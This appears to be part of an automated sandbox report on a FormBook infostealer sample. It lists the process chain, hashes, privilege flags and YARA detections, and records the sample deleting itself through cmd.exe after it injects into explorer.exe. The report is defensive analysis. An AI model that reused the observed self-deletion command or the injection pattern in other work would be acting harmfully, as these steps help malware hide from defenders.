                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                        Imagebase:0xb0000
                                                                                                                                                        File size:1832960 bytes
                                                                                                                                                        MD5 hash:92BD99870C4E2829F3E6D1B3B512067D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Reputation:low

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:12
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:
                                                                                                                                                        Imagebase:0xffca0000
                                                                                                                                                        File size:3229696 bytes
                                                                                                                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:29
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                        Imagebase:0xf30000
                                                                                                                                                        File size:658944 bytes
                                                                                                                                                        MD5 hash:A475B7BB0CCCFD848AA26075E81D7888
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:36
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                        File size:2972672 bytes
                                                                                                                                                        MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:08:29:37
                                                                                                                                                        Start date:13/05/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                        Imagebase:0x49f70000
                                                                                                                                                        File size:302592 bytes
                                                                                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis

                                                                                                                                                        Reset < >